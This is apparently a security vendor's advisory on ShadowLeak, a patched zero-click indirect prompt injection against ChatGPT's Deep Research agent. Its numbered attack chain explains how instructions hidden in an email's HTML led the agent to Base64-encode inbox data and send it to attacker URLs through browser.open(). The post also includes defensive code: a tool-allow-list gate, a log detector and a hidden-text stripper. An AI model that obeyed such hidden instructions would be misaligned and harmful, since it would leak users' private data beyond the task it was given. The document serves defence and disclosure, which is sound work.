
ShadowLeak: The Zero-Click Attack That Steals Data Through ChatGPT

How a Hidden Email Turned an AI Agent into a Silent Data Exfiltration Tool

Date: February 18, 2026
Primary Source: Radware Threat Advisory - ShadowLeak

ShadowLeak zero-click data exfiltration through ChatGPT Deep Research


Executive Summary

  • What: ShadowLeak is a zero-click, service-side indirect prompt injection vulnerability in OpenAI's ChatGPT Deep Research agent that silently exfiltrates data from connected accounts (Gmail, Drive, Outlook, SharePoint)
  • Who is affected: All ChatGPT users with connected accounts; OpenAI reported 5 million paying business users before the fix
  • Severity: High. The attack achieved a 100% success rate in testing and is invisible to all endpoint and network defenses
  • Status: Patched by OpenAI (August 2025); not exploited in the wild
  • Action required: Audit AI agent connectors, limit agent permissions, and apply Zero-Trust positive controls to data sources, models, and tools

🧠 Overview

Radware's Security Research Center has disclosed ShadowLeak, the first known zero-click, service-side indirect prompt injection vulnerability in OpenAI's ChatGPT Deep Research agent. The vulnerability allowed an attacker to silently exfiltrate personal data from a victim's connected accounts (Gmail, Google Drive, Outlook, SharePoint, and others) without the victim clicking anything, seeing any indication of compromise, or leaving any trace on their local network. (Radware, Security Affairs)

Unlike previously disclosed AI prompt injection attacks (such as AgentFlayer and EchoLeak) that relied on client-side image rendering to trigger exfiltration, ShadowLeak operates entirely within OpenAI's cloud infrastructure. That means the data theft is invisible to endpoint security tools, firewalls, DLP solutions, and EDR platforms. The victim's machine never touches the stolen data. (Infosecurity Magazine)

With OpenAI reporting 5 million paying business users on ChatGPT, the potential exposure was massive before the fix was deployed.


πŸ” Threat Summary

| Field | Detail |
|---|---|
| Vulnerability Name | ShadowLeak |
| CVE ID(s) | None assigned |
| CVSS Score | Not rated (no CVE) |
| Affected Product | OpenAI ChatGPT Deep Research agent (with connected accounts) |
| Attack Vector | Network; indirect prompt injection via email |
| Exploited in the Wild | No (per Radware) |
| Patch Available | Yes; OpenAI deployed a fix by early August 2025, confirmed resolved September 3, 2025 |
| Discovered By | Gabi Nakibly and Zvika Babo (co-leads), Maor Uziel (contributor), Radware |

🔬 Technical Analysis

How the Attack Works

ShadowLeak exploits the fundamental inability of large language models to distinguish between trusted system instructions and untrusted user-supplied content, a class of vulnerability known as indirect prompt injection. For a practical demonstration of how hidden prompt injection manipulates an AI shopping agent into overpaying for purchases and potentially exfiltrating PII, see Securing AI Agents: How to Prevent Hidden Prompt Injection Attacks (at 3:54).

The attack chain proceeds as follows:

  1. Attacker crafts a malicious email with a benign-looking subject line (e.g., "Restructuring Package - Action Items"). The email body contains hidden prompt injection commands embedded in the HTML using obfuscation techniques (white-on-white text, microscopic fonts, or hidden CSS styling) that are invisible to the human reader but readable by the AI agent. (Security Affairs, Infosecurity Magazine)

  2. Victim asks Deep Research to process their inbox β€” for example, "Summarize today's emails" or "Research the topics in my recent messages." The agent connects to Gmail (or another integrated service) and begins reading messages. (The Record)

  3. The agent ingests the booby-trapped email. Because Deep Research cannot distinguish between legitimate email content and injected instructions, it treats the hidden commands as part of its task. (Infosecurity Magazine)

  4. The agent extracts PII from the victim's inbox β€” full names, addresses, email contents, metadata, and any other data accessible through connected services (Google Drive, Dropbox, SharePoint, Teams, Outlook). (Security Affairs)

  5. Data is encoded in Base64 and exfiltrated via the agent's built-in browser.open() tool, which makes HTTP requests to attacker-controlled URLs with the stolen data injected as URL parameters. The hidden instructions even tell the agent to "retry several times" to ensure delivery. (Infosecurity Magazine)

  6. Exfiltration completes entirely on OpenAI's servers. No data passes through the victim's browser, endpoint, or network. There are no client-side artifacts, no suspicious DNS queries, and no unusual outbound connections: nothing for local defenses to detect. (Security Affairs)

Payload and Impact

ShadowLeak is a data exfiltration attack. It does not deliver malware to the endpoint. The "payload" is the silent theft of PII and business data from any service connected to the ChatGPT agent:

  • Email content and metadata (Gmail, Outlook)
  • Documents and files (Google Drive, Dropbox, SharePoint)
  • Messages (Teams, Slack via connectors)
  • CRM and project data (HubSpot, Notion)
  • Code repositories (GitHub)
  • Meeting invitations, contracts, customer records

In Radware's testing, the attack achieved a 100% success rate in exfiltrating Gmail data. (Infosecurity Magazine)


⚠️ Why Traditional Defenses Struggle

ShadowLeak is specifically designed to be invisible to every layer of traditional endpoint and network security:

  • Endpoint Detection & Response (EDR): No malicious process executes on the victim's machine. There is nothing to detect. The agent runs on OpenAI's servers, not locally.

  • Firewalls and Network Monitoring: The exfiltration traffic originates from OpenAI's cloud infrastructure, not from the victim's network. No suspicious outbound connections appear in network logs.

  • Data Loss Prevention (DLP): DLP tools monitor data leaving the organization's perimeter. ShadowLeak exfiltrates data that is already in a cloud service (Gmail), routed through another cloud service (OpenAI), to a third-party URL, entirely outside the organization's visibility.

  • Email Security Gateways: The malicious email contains no attachments, no links, and no macros, just invisible HTML text. There is no payload for sandboxes to detonate and no URL reputation to check.

  • Signature-Based AV / Behavioral Heuristics: There is no file to scan. There is no executable. The "malware" is a text string hidden in an email, interpreted by an AI model running on someone else's servers.

This is the core challenge: the attack surface has moved from the endpoint to the AI service provider's infrastructure, and traditional security tools have zero visibility into that layer.


🛑 How White Cloud Security Trust Lockdown Addresses This Threat

Zero-Trust AI Security: Positive Controls, Not Blacklists

The instinctive response to ShadowLeak is to try to filter out malicious prompts: scanning emails for hidden text, blacklisting injection patterns, or building ever-larger lists of "bad" prompt strings. That approach is doomed for the same reason signature-based AV is doomed: attackers will always find new patterns faster than defenders can catalog them.

Zero-Trust AI security is not about blacklisting prompts or data. It is about providing positive controls over three things: the data sources an agent can access, the models it can invoke, and the tools it can use to interact with the real or cyber world.

This is the same architectural insight that makes WCS Trust Lockdown effective at the endpoint. WCS does not try to identify every malicious executable; it positively approves every executable that is authorized to run. Everything else is denied by default. The same model applies to AI agents:

| Control Layer | Endpoint (WCS Trust Lockdown) | AI Agent (Zero-Trust AI) |
|---|---|---|
| What can execute | Only handprint-verified, admin-approved software | Only admin-approved models and agent configurations |
| What data can be accessed | File-level access governed by OS + trust policy | Only explicitly authorized data connectors (not "all of Gmail") |
| What tools can be used | Only approved executables, DLLs, and scripts | Only approved agent tools; no browser.open() to arbitrary URLs without policy |
| What can leave the perimeter | Controlled by trust policy + egress rules | Controlled by approved output channels; no silent HTTP exfiltration |

Mapping Positive Controls to the ShadowLeak Kill Chain

Here's how positive controls, rather than blacklists, stop each stage of this attack:

| Attack Step | Positive Control |
|---|---|
| 1. Malicious email arrives | Data source control: The agent should only ingest data from admin-approved sources and mailboxes, not the entire inbox by default. Connectors are opt-in, not opt-out. |
| 2. AI agent reads inbox | Least-privilege scope: The agent's read access should be limited to specific folders, labels, or senders relevant to the current task, not every message ever received. |
| 3. Agent executes hidden instructions | Tool authorization: The agent's available tools (browser, file access, API calls) are governed by an explicit allow-list, just as WCS governs which executables can run. If browser.open() isn't on the approved tool list, the injected command fails silently. |
| 4. Data exfiltration via URL | Output channel control: The agent can only send data to admin-approved destinations. Outbound HTTP to unknown URLs is denied by default; no blacklist required. |
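The kill-chain mapping above is easiest to reason about as code. The following is an added example written for this article; it is not White Cloud Security's, Radware's or OpenAI's code. It models a default-deny gate that every agent tool call must pass: tools, connector scopes and outbound destinations are approved explicitly, and everything else is denied and written to an audit log. The class name ToolPolicy, the tool identifiers ("connector.read", "browser.open"), the hosts and the assumption that the agent runtime calls authorize() before executing any tool are all constructed for the example.

```python
"""Default-deny policy gate for AI agent tool calls.

Added example, not White Cloud Security's, Radware's or OpenAI's code.
ToolPolicy, the tool names and the hosts below are assumptions; the agent
runtime is assumed to call authorize() before it executes any tool.
"""
from dataclasses import dataclass, field
from urllib.parse import urlparse


@dataclass(frozen=True)
class Decision:
    allowed: bool
    reason: str


@dataclass
class ToolPolicy:
    approved_tools: frozenset            # tool names the agent may call at all
    approved_connectors: dict            # connector -> set of approved scopes
    approved_hosts: frozenset            # https hosts browser.open may fetch
    audit: list = field(default_factory=list)

    def authorize(self, task_id, tool, **args):
        """Decide one tool call and record it; the caller must honour the result."""
        decision = self._evaluate(tool, args)
        self.audit.append({"task": task_id, "tool": tool, "args": args,
                           "allowed": decision.allowed, "reason": decision.reason})
        return decision

    def _evaluate(self, tool, args):
        if tool not in self.approved_tools:
            return Decision(False, f"tool {tool!r} is not on the approved tool list")
        if tool == "browser.open":
            return self._check_destination(args.get("url", ""))
        if tool == "connector.read":
            return self._check_connector(args.get("connector"), args.get("scope"))
        return Decision(True, "approved tool with no argument constraints")

    def _check_destination(self, url):
        parsed = urlparse(url)
        if parsed.scheme != "https":
            return Decision(False, "only https destinations are permitted")
        if parsed.hostname not in self.approved_hosts:
            return Decision(False, f"host {parsed.hostname!r} is not an approved destination")
        if parsed.query or parsed.fragment:
            # Assumption: approved hosts are fetched by path only, so data cannot
            # ride along as URL parameters even to an approved host.
            return Decision(False, "query strings are not permitted on outbound requests")
        return Decision(True, "destination approved")

    def _check_connector(self, connector, scope):
        scopes = self.approved_connectors.get(connector)
        if scopes is None:
            return Decision(False, f"connector {connector!r} is not approved")
        if scope not in scopes:
            return Decision(False, f"scope {scope!r} is not approved for {connector!r}")
        return Decision(True, "connector scope approved")


def demo():
    """Run the kill-chain steps against a constructed policy; returns (outcomes, audit)."""
    policy = ToolPolicy(
        approved_tools=frozenset({"connector.read", "browser.open"}),
        approved_connectors={"gmail": {"label:Project-Alpha"}},   # not "all of Gmail"
        approved_hosts=frozenset({"docs.example.com"}),          # constructed host
    )
    calls = [
        ("connector.read", {"connector": "gmail", "scope": "label:Project-Alpha"}),
        ("connector.read", {"connector": "gmail", "scope": "inbox"}),
        ("browser.open", {"url": "https://docs.example.com/guide"}),
        ("browser.open", {"url": "https://unapproved.example.net/c?d=QUJD"}),
        ("browser.open", {"url": "https://docs.example.com/guide?d=QUJD"}),
        ("file.write", {"path": "/tmp/notes.txt"}),
    ]
    outcomes = [policy.authorize("task-1", tool, **args).allowed for tool, args in calls]
    return outcomes, policy.audit


if __name__ == "__main__":
    outcomes, log = demo()
    for entry in log:
        print("ALLOW" if entry["allowed"] else "DENY ", entry["tool"], entry["reason"])
```

Note that no blacklist appears anywhere: the unapproved collector host is denied because it is absent from approved_hosts, and the same request to an approved host is still denied because data-bearing query strings are not an approved output channel. The audit list is the record a SOC would ingest to see injected commands failing.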

The Broader Lesson: Default-Deny for Agents

WCS Trust Lockdown uses handprint identity (multi-hash + file length) to positively verify every executable before it runs. The same philosophy, explicitly approve what is allowed and deny everything else, is the only viable security model for AI agents:

  • Approve the data sources. Don't let agents browse everything; grant access to specific repositories, mailboxes, and services on a per-task basis.
  • Approve the models. Control which AI models your organization permits and how they are configured. Not every task requires an agent with tool-use capabilities.
  • Approve the tools. An AI agent's ability to open URLs, write files, send messages, or call APIs should be governed by policy, not left open by default.

This is not theoretical. It is the same default-deny principle that has protected WCS Trust Lockdown customers from every ransomware variant, every zero-day exploit, and every supply chain attack that depends on executing unauthorized code. The principle scales from executables to agents.

"At White Cloud Security, we continue to track and report new hacking methods and tools, not just because of their immediate threat, but because patterns of reuse often expose the playbooks of these cybercriminal groups."

ShadowLeak is a warning: as organizations adopt AI agents with deep access to business data, blacklisting bad prompts is not a security strategy. Positive control over data sources, models, and tools is. Default-deny is not just for executables; it is the architecture that works wherever autonomous actions occur.


For Organizations Using ChatGPT or AI Agents

  • Audit connected services: Review which accounts and data sources are connected to AI agents. Disable connectors that are not actively needed.
  • Limit agent permissions: Where possible, restrict AI agents to read-only access and disable tool capabilities (like browser.open()) that are not required for your use case.
  • Monitor agent activity: Implement logging and monitoring of AI agent actions. Track what data is accessed and what external requests are made.
  • Educate users: Ensure employees understand that asking an AI agent to "summarize my inbox" grants it access to every message, including potentially malicious ones.
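The "monitor agent activity" item above is the one place where an organization can still see this attack: the service provider's agent action log (or the organization's own proxy for agent traffic) records what the agent fetched. The following is an added example written for this article, not White Cloud Security's, Radware's or OpenAI's code. It runs two detections over a constructed JSON-lines action log: a browser.open query parameter that decodes from Base64 to readable text (the encoding the advisory describes), and the same endpoint being requested repeatedly within one task (the "retry several times" behaviour). The log format, field names, hosts and thresholds are assumptions.

```python
"""Detect exfiltration-shaped outbound requests in AI agent action logs.

Added example, not White Cloud Security's, Radware's or OpenAI's code.
The JSON-lines log format, field names and thresholds are assumptions.
"""
import base64
import binascii
import json
import re
from collections import Counter
from urllib.parse import parse_qsl, urlparse

EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+")
MIN_BLOB_LEN = 24      # assumption: shorter parameter values are ignored
RETRY_THRESHOLD = 3    # assumption: 3+ requests to one endpoint per task is suspicious


def decode_base64_blob(value):
    """Return the decoded text if value is Base64 (standard or URL-safe) that
    decodes to printable UTF-8, otherwise None."""
    if len(value) < MIN_BLOB_LEN or not re.fullmatch(r"[A-Za-z0-9+/_=-]+", value):
        return None
    normalised = value.replace("-", "+").replace("_", "/")
    normalised += "=" * (-len(normalised) % 4)
    try:
        text = base64.b64decode(normalised, validate=True).decode("utf-8")
    except (binascii.Error, ValueError):   # UnicodeDecodeError is a ValueError
        return None
    if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def analyze_agent_log(lines):
    """Return a list of alerts for the given JSON-lines agent action log."""
    alerts = []
    endpoint_hits = Counter()
    for line in lines:
        event = json.loads(line)
        if event.get("tool") != "browser.open":
            continue  # connector reads are governed by the policy gate, not flagged here
        url = urlparse(event["args"]["url"])
        endpoint = f"{url.scheme}://{url.netloc}{url.path}"
        endpoint_hits[(event["task"], endpoint)] += 1
        for param, value in parse_qsl(url.query, keep_blank_values=True):
            decoded = decode_base64_blob(value)
            if decoded is None:
                continue
            alerts.append({
                "task": event["task"], "ts": event["ts"], "host": url.hostname,
                "param": param,
                "kind": "encoded_pii" if EMAIL_RE.search(decoded) else "encoded_blob",
                "sample": decoded[:60],
            })
    for (task, endpoint), count in endpoint_hits.items():
        if count >= RETRY_THRESHOLD:
            alerts.append({"task": task, "endpoint": endpoint,
                           "kind": "repeated_requests", "count": count})
    return alerts


# Constructed sample log: one connector read, one legitimate page fetch and
# three retried requests carrying a Base64-encoded record to a collector host.
CONSTRUCTED_RECORD = b"name=Jane Doe; email=jane.doe@example.com"
CONSTRUCTED_BLOB = base64.urlsafe_b64encode(CONSTRUCTED_RECORD).decode()
SAMPLE_LOG = [
    json.dumps({"ts": "2025-08-01T09:00:01Z", "task": "task-42", "tool": "connector.read",
                "args": {"connector": "gmail", "scope": "inbox"}}),
    json.dumps({"ts": "2025-08-01T09:00:02Z", "task": "task-42", "tool": "browser.open",
                "args": {"url": "https://docs.example.com/policy"}}),
] + [
    json.dumps({"ts": f"2025-08-01T09:00:0{i}Z", "task": "task-42", "tool": "browser.open",
                "args": {"url": f"https://collector.example.net/c?d={CONSTRUCTED_BLOB}"}})
    for i in (3, 4, 5)
]

if __name__ == "__main__":
    for alert in analyze_agent_log(SAMPLE_LOG):
        print(json.dumps(alert))
```

On the sample log this produces three encoded_pii alerts (one per retried request) and one repeated_requests alert, while the legitimate documentation fetch produces nothing. The decode step deliberately requires printable UTF-8 so that opaque session tokens and signatures, which are also long Base64-looking strings, are not flagged.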

For AI Platform Providers

  • Normalize and strip invisible content: Before processing emails or documents, strip white-on-white text, microscopic fonts, hidden CSS, and other obfuscation techniques. (Security Affairs)
  • Implement agent intent validation: Continuously verify that agent actions remain consistent with the user's original request. (Security Affairs)
  • Default-deny for agent tool use: Require explicit user confirmation before agents make outbound HTTP requests to URLs not in the original task scope.
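The first of these recommendations can be made concrete. The following is an added example written for this article, not Radware's or OpenAI's code, and not a description of how ChatGPT processes email. It walks an HTML email with the standard library and separates text a human would see from text that is only readable by a parser, covering the hiding techniques the attack chain describes: text coloured to match its background, fonts below a visible size, display:none, visibility:hidden, zero opacity and off-screen positioning. The thresholds, the colour table and the default white page background are assumptions; the sample email is constructed and its hidden parts are placeholders.

```python
"""Strip visually hidden content from an HTML email before an agent reads it.

Added example, not Radware's or OpenAI's code. It implements the "normalize
and strip invisible content" recommendation with the standard library only.
Thresholds, the colour table and the default page background are assumptions.
"""
import re
from html.parser import HTMLParser

MIN_FONT_PX = 6  # assumption: text rendered below 6px is treated as hidden

# Inline-style patterns that make an element invisible regardless of colour.
HIDDEN_STYLE_PATTERNS = [
    re.compile(r"display\s*:\s*none", re.I),
    re.compile(r"visibility\s*:\s*hidden", re.I),
    re.compile(r"(?<![-\w])opacity\s*:\s*0(?:\.0+)?\s*(?:;|$)", re.I),
    re.compile(r"(?:left|top|text-indent)\s*:\s*-\d{3,}px", re.I),  # pushed off-screen
]
NON_VISIBLE_TAGS = {"script", "style", "head", "title", "template"}
VOID_TAGS = {"br", "img", "hr", "input", "meta", "link", "area", "base", "col", "wbr"}
NAMED_COLOURS = {"white": "#ffffff", "black": "#000000"}  # assumption: extend as needed


def _style_value(style, prop_pattern):
    """Return a colour value (hex or simple keyword) for a CSS property, or None."""
    m = re.search(prop_pattern + r"\s*:\s*(#[0-9a-f]{3,6}|[a-z]+)", style, re.I)
    return m.group(1).lower() if m else None


def _norm_colour(colour):
    if colour is None:
        return None
    colour = NAMED_COLOURS.get(colour, colour)
    if re.fullmatch(r"#[0-9a-f]{3}", colour):  # expand #fff to #ffffff
        colour = "#" + "".join(ch * 2 for ch in colour[1:])
    return colour


def _font_px(style):
    m = re.search(r"font-size\s*:\s*([\d.]+)\s*(px|pt)", style, re.I)
    if not m:
        return None
    size = float(m.group(1))
    return size if m.group(2).lower() == "px" else size * 4 / 3  # pt to px


class HiddenTextStripper(HTMLParser):
    """Separates text a human would see from text only a parser would read."""

    def __init__(self, page_background="#ffffff"):
        super().__init__(convert_charrefs=True)
        # Stack frames: (tag, hidden, effective background colour)
        self.stack = [("root", False, _norm_colour(page_background))]
        self.visible, self.stripped = [], []

    def _classify(self, tag, attrs, parent_hidden, parent_bg):
        a = dict(attrs)
        style = a.get("style") or ""
        bg = _norm_colour(_style_value(style, r"background(?:-color)?")) or parent_bg
        if parent_hidden or tag in NON_VISIBLE_TAGS or "hidden" in a:
            return True, bg
        if any(p.search(style) for p in HIDDEN_STYLE_PATTERNS):
            return True, bg
        size = _font_px(style)
        if size is not None and size < MIN_FONT_PX:
            return True, bg
        fg = _norm_colour(_style_value(style, r"(?<![-\w])color"))
        if fg is not None and fg == bg:  # text colour matches its background
            return True, bg
        return False, bg

    def handle_starttag(self, tag, attrs):
        _, parent_hidden, parent_bg = self.stack[-1]
        hidden, bg = self._classify(tag, attrs, parent_hidden, parent_bg)
        if tag not in VOID_TAGS:
            self.stack.append((tag, hidden, bg))

    def handle_endtag(self, tag):
        # Pop back to the matching open tag; tolerate unbalanced markup.
        for i in range(len(self.stack) - 1, 0, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break

    def handle_data(self, data):
        text = " ".join(data.split())
        if text:
            (self.stripped if self.stack[-1][1] else self.visible).append(text)


def strip_hidden_content(html, page_background="#ffffff"):
    """Return (visible_text, stripped_text); stripped_text is what to log for audit."""
    parser = HiddenTextStripper(page_background)
    parser.feed(html)
    parser.close()
    return " ".join(parser.visible), " ".join(parser.stripped)


# Constructed sample: one benign paragraph plus three hidden placeholders.
SAMPLE_EMAIL = """<html><body style="background-color:#ffffff">
<p>Hi team, please review the restructuring action items by Friday.</p>
<p style="color:#ffffff">[HIDDEN WHITE-ON-WHITE TEXT placeholder]</p>
<span style="font-size:1px">[HIDDEN 1PX TEXT placeholder]</span>
<div style="display:none">[HIDDEN DISPLAY-NONE TEXT placeholder]</div>
<p>Thanks, <b>Dana</b></p>
</body></html>"""

if __name__ == "__main__":
    shown, removed = strip_hidden_content(SAMPLE_EMAIL)
    print("agent sees:", shown)
    print("stripped  :", removed)
```

Only the visible text should reach the model; the stripped text should be logged rather than discarded, because a non-empty stripped portion in an ordinary business email is itself a useful detection signal. Inline styles are the common case in email, but a production version would also need to resolve stylesheet rules and rendered colour contrast, which this example leaves out.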

For Endpoint Security (WCS Trust Lockdown)

  • Maintain default-deny posture: ShadowLeak does not deliver endpoint malware, but the techniques it uses (prompt injection, social engineering) will inevitably be combined with endpoint payloads. A default-deny posture ensures that even if an AI-assisted attack chain eventually drops an executable, it cannot run without explicit approval.
  • Monitor for follow-on attacks: Data stolen via ShadowLeak (credentials, internal documents, org charts) can fuel targeted endpoint attacks. Ensure Trust Lockdown policies are current and all endpoints are protected.

📌 Key Takeaways

  • ShadowLeak is the first zero-click, service-side prompt injection attack against ChatGPT, capable of silently exfiltrating data from Gmail, Drive, Outlook, SharePoint, and other connected services with a 100% success rate in testing.
  • Traditional endpoint and network defenses cannot detect it because the entire attack, from ingestion to exfiltration, happens within OpenAI's cloud infrastructure, leaving zero artifacts on the victim's machine or network.
  • The attack exploits a fundamental LLM limitation: the inability to distinguish trusted instructions from untrusted content. Every AI agent that processes external data is therefore potentially vulnerable to similar techniques.
  • Zero-Trust AI security means positive controls, not blacklists. Trying to filter malicious prompts is a losing game. Organizations need default-deny governance over the data sources agents can access, the models they can invoke, and the tools they can use: the same architecture that makes WCS Trust Lockdown effective at the endpoint.

📚 References

  1. Radware. "ShadowLeak Threat Advisory."
  2. Security Affairs. "ShadowLeak: Radware Uncovers Zero-Click Attack on ChatGPT."
  3. Infosecurity Magazine. "Zero-Click Flaw in ChatGPT's Agent Enables Silent Gmail Data Theft."
  4. GlobeNewsWire. "Radware Uncovers First Zero-Click Vulnerability in ChatGPT."
  5. The Record. "OpenAI Fixes Zero-Click ShadowLeak Vulnerability."
  6. Security Brief. "ShadowLeak Exploit Exposes ChatGPT Users to Silent AI Data Theft."
  7. YouTube. "Securing AI Agents: How to Prevent Hidden Prompt Injection Attacks."
